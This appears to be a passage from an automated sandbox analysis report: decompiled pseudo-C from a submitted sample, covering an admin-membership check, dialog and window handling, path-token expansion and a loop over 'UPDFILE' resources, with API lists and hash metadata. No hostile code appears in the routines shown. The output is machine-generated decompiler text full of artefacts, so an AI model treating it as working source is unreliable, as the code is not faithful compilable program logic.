                                                                                                                                                                                                                                            				signed int _t14;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t39;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t14 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t37 = __ecx;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v28 = __ecx;
                                                                                                                                                                                                                                            				_t28 = 0;
                                                                                                                                                                                                                                            				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                                                            				if(_t36 != 0) {
                                                                                                                                                                                                                                            					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                                                            					_v20 = _t20;
                                                                                                                                                                                                                                            					if(_t20 != 0) {
                                                                                                                                                                                                                                            						 *_t37 = 0;
                                                                                                                                                                                                                                            						_t28 = 1;
                                                                                                                                                                                                                                            						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                                                            							_t37 = _t39;
                                                                                                                                                                                                                                            							 *0xa4a288(0, _v24, _v28);
                                                                                                                                                                                                                                            							_v20();
                                                                                                                                                                                                                                            							if(_t39 != _t39) {
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							FreeSid(_v24);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t36);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                                                            			}




















                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A418DD), ref: 00A4181A
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A4182C
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(00A418DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A418DD), ref: 00A41855
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?,?,?,?,00A418DD), ref: 00A41883
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,00A418DD), ref: 00A4188A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                            • Opcode ID: cd1ebb32f32764dac27a85674e0984df8b3eac6836dbe0c6744eea423da2cdf3
                                                                                                                                                                                                                                            • Instruction ID: 0191974d26e96d3df24a553f31a4974ef7f34523b0195de0d147a7049718185e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd1ebb32f32764dac27a85674e0984df8b3eac6836dbe0c6744eea423da2cdf3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6911637DE40209ABDB10DFE4DC49ABEBB78EFC5701F100569F906E2290DB719D458B91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A43450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t7 == 0) {
                                                                                                                                                                                                                                            					EndDialog(_a4, 2);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t24 = _a4;
                                                                                                                                                                                                                                            					E00A443D0(_t24, _t12);
                                                                                                                                                                                                                                            					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t24, 0x838,  *0xa49404);
                                                                                                                                                                                                                                            					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t11 == 1) {
                                                                                                                                                                                                                                            					_t22 = _a12;
                                                                                                                                                                                                                                            					if(_t22 < 6) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 <= 7) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 != 0x839) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0xa491dc = 1;
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00A43490
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 00A4349A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 00A434B2
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000838), ref: 00A434C4
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 00A434CB
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000002), ref: 00A434D8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                            • String ID: cent
                                                                                                                                                                                                                                            • API String ID: 852535152-3940384054
                                                                                                                                                                                                                                            • Opcode ID: 8418edbc45efde766cf7314e46f3d1c85dc3cb4e92df9c38a892a7e187d7db19
                                                                                                                                                                                                                                            • Instruction ID: 6dc8fdd778292c6c8fa3b670d0349920f96fd2707c7d06e3a220fe3cf78ba75e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8418edbc45efde766cf7314e46f3d1c85dc3cb4e92df9c38a892a7e187d7db19
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A301B53E280114ABDB569FA9DC0C9EE3A64EFC6712F004110F946869A0C7729F52D785
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00A42AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				char _t32;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				char* _t38;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                                            				CHAR* _t59;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t60 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_t65 = _a4;
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t64 = __ecx;
                                                                                                                                                                                                                                            				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                            					GetModuleFileNameA( *0xa49a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_t17 =  *_t64;
                                                                                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                            						 *_t65 =  *_t64;
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t65[1] = _t64[1];
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                            							L19:
                                                                                                                                                                                                                                            							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                            								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                            									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                            										goto L19;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A41680(_t65, E00A417C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            									_t52 = _t65;
                                                                                                                                                                                                                                            									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                            									_t60 = _t14;
                                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                                            										_t32 =  *_t52;
                                                                                                                                                                                                                                            										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                            									} while (_t32 != 0);
                                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								E00A465E8( &_v268);
                                                                                                                                                                                                                                            								_t55 =  &_v268;
                                                                                                                                                                                                                                            								_t62 = _t55 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t34 =  *_t55;
                                                                                                                                                                                                                                            									_t55 = _t55 + 1;
                                                                                                                                                                                                                                            								} while (_t34 != 0);
                                                                                                                                                                                                                                            								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                            								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                            									 *_t38 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								E00A41680(_t65, E00A417C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            								_t59 = _t65;
                                                                                                                                                                                                                                            								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                            								_t60 = _t12;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t42 =  *_t59;
                                                                                                                                                                                                                                            									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                            								} while (_t42 != 0);
                                                                                                                                                                                                                                            								L17:
                                                                                                                                                                                                                                            								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *_t65 = _t17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x00a42bda
                                                                                                                                                                                                                                            0x00a42be6
                                                                                                                                                                                                                                            0x00a42be6
                                                                                                                                                                                                                                            0x00a42bf8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00A42AE6
                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 00A42AF2
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00A42B12
                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 00A42B1E
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 00A42B55
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00A42BD4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                            • Opcode ID: 561059cd6ee822189f3205d495ee4ba9fcae6796a2b6dfa018b47a287969c5b1
                                                                                                                                                                                                                                            • Instruction ID: 03237458580ec29a2dbddfcec671bdb08432aef092f54e20953936de3705834b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 561059cd6ee822189f3205d495ee4ba9fcae6796a2b6dfa018b47a287969c5b1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB41D03C5042859EDB159F249C54BFE7BA9DFD7300F54419AE8C287202DB268E87CB61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                                            			E00A443D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				struct tagRECT _v24;
                                                                                                                                                                                                                                            				struct tagRECT _v40;
                                                                                                                                                                                                                                            				struct HWND__* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				int _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				int _v60;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t29;
                                                                                                                                                                                                                                            				void* _t53;
                                                                                                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				struct HWND__* _t63;
                                                                                                                                                                                                                                            				struct HWND__* _t67;
                                                                                                                                                                                                                                            				struct HWND__* _t68;
                                                                                                                                                                                                                                            				struct HDC__* _t69;
                                                                                                                                                                                                                                            				int _t72;
                                                                                                                                                                                                                                            				signed int _t74;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t63 = __edx;
                                                                                                                                                                                                                                            				_t29 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t29 ^ _t74;
                                                                                                                                                                                                                                            				_t68 = __edx;
                                                                                                                                                                                                                                            				_v44 = __ecx;
                                                                                                                                                                                                                                            				GetWindowRect(__ecx,  &_v40);
                                                                                                                                                                                                                                            				_t53 = _v40.bottom - _v40.top;
                                                                                                                                                                                                                                            				_v48 = _v40.right - _v40.left;
                                                                                                                                                                                                                                            				GetWindowRect(_t68,  &_v24);
                                                                                                                                                                                                                                            				_v56 = _v24.bottom - _v24.top;
                                                                                                                                                                                                                                            				_t69 = GetDC(_v44);
                                                                                                                                                                                                                                            				_v52 = GetDeviceCaps(_t69, 8);
                                                                                                                                                                                                                                            				_v60 = GetDeviceCaps(_t69, 0xa);
                                                                                                                                                                                                                                            				ReleaseDC(_v44, _t69);
                                                                                                                                                                                                                                            				_t56 = _v48;
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                                                                                                                                                                                                            				_t67 = 0;
                                                                                                                                                                                                                                            				if(_t72 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v52;
                                                                                                                                                                                                                                            					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                                                            						_t72 = _t63 - _t56;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t72 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				asm("cdq");
                                                                                                                                                                                                                                            				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                                                            				if(_t59 >= 0) {
                                                                                                                                                                                                                                            					_t63 = _v60;
                                                                                                                                                                                                                                            					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                                                            						_t59 = _t63 - _t53;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t59 = _t67;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                                                            			}
























                                                                                                                                                                                                                                            0x00a44496
                                                                                                                                                                                                                                            0x00a44496
                                                                                                                                                                                                                                            0x00a44486
                                                                                                                                                                                                                                            0x00a44486
                                                                                                                                                                                                                                            0x00a44486
                                                                                                                                                                                                                                            0x00a444b8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00A443F1
                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 00A4440B
                                                                                                                                                                                                                                            • GetDC.USER32(?), ref: 00A44423
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00A4442E
                                                                                                                                                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00A4443A
                                                                                                                                                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00A44447
                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00A444A2
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2212493051-0
                                                                                                                                                                                                                                            • Opcode ID: 2db2b571eeebfc898378c1710488ddf51459b53df6d0585a31a0ed1a00349fe0
                                                                                                                                                                                                                                            • Instruction ID: 09e627620d5225456f532c7014d2fcc558840ea8f017e7ca10c8d6f3f05f2b73
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2db2b571eeebfc898378c1710488ddf51459b53df6d0585a31a0ed1a00349fe0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 68312D3AE00519AFCB14CFF8DD899EEBBB5EBC9310F154269F805B3250DA316D058B60
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                                            			E00A46298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _v36;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				struct HRSRC__* _t21;
                                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				intOrPtr* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				signed int _t50;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                                                            				_t46 = 0;
                                                                                                                                                                                                                                            				_v32 = __ecx;
                                                                                                                                                                                                                                            				_v36 = 0;
                                                                                                                                                                                                                                            				_t36 = 1;
                                                                                                                                                                                                                                            				E00A4171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t51 = _t51 + 0x10;
                                                                                                                                                                                                                                            					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                                                            					if(_t45 == 0) {
                                                                                                                                                                                                                                            						 *0xa49124 = 0x80070714;
                                                                                                                                                                                                                                            						_t36 = _t46;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                                                            						_t44 = _t5;
                                                                                                                                                                                                                                            						_t40 = _t44;
                                                                                                                                                                                                                                            						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                                                            						_t47 = _t6;
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							_t26 =  *_t40;
                                                                                                                                                                                                                                            							_t40 = _t40 + 1;
                                                                                                                                                                                                                                            						} while (_t26 != 0);
                                                                                                                                                                                                                                            						_t41 = _t40 - _t47;
                                                                                                                                                                                                                                            						_t46 = _t51;
                                                                                                                                                                                                                                            						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                                                            						 *0xa4a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                                                            						_t30 = _v32();
                                                                                                                                                                                                                                            						if(_t51 != _t51) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_push(_t45);
                                                                                                                                                                                                                                            						if(_t30 == 0) {
                                                                                                                                                                                                                                            							_t36 = 0;
                                                                                                                                                                                                                                            							FreeResource(??);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							FreeResource();
                                                                                                                                                                                                                                            							_v36 = _v36 + 1;
                                                                                                                                                                                                                                            							E00A4171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                                                            							_t46 = 0;
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					return E00A46CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L12;
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A4171E: _vsnprintf.MSVCRT ref: 00A41750
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00A451CA,00000004,00000024,00A42F71,?,00000002,00000000), ref: 00A462CD
                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A451CA,00000004,00000024,00A42F71,?,00000002,00000000), ref: 00A462D4
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A451CA,00000004,00000024,00A42F71,?,00000002,00000000), ref: 00A4631B
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00A46345
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00A451CA,00000004,00000024,00A42F71,?,00000002,00000000), ref: 00A46357
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                                                            • String ID: UPDFILE%lu
                                                                                                                                                                                                                                            • API String ID: 2922116661-2329316264
                                                                                                                                                                                                                                            • Opcode ID: 672d30673ffe0fb7495e364e4638537c181a3aba564abcd8b2325441d58e8227
                                                                                                                                                                                                                                            • Instruction ID: 310f84ef5f3859c3df3d252d89a6b60caf86e2bde9b062e0606866d28b277d51
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 672d30673ffe0fb7495e364e4638537c181a3aba564abcd8b2325441d58e8227
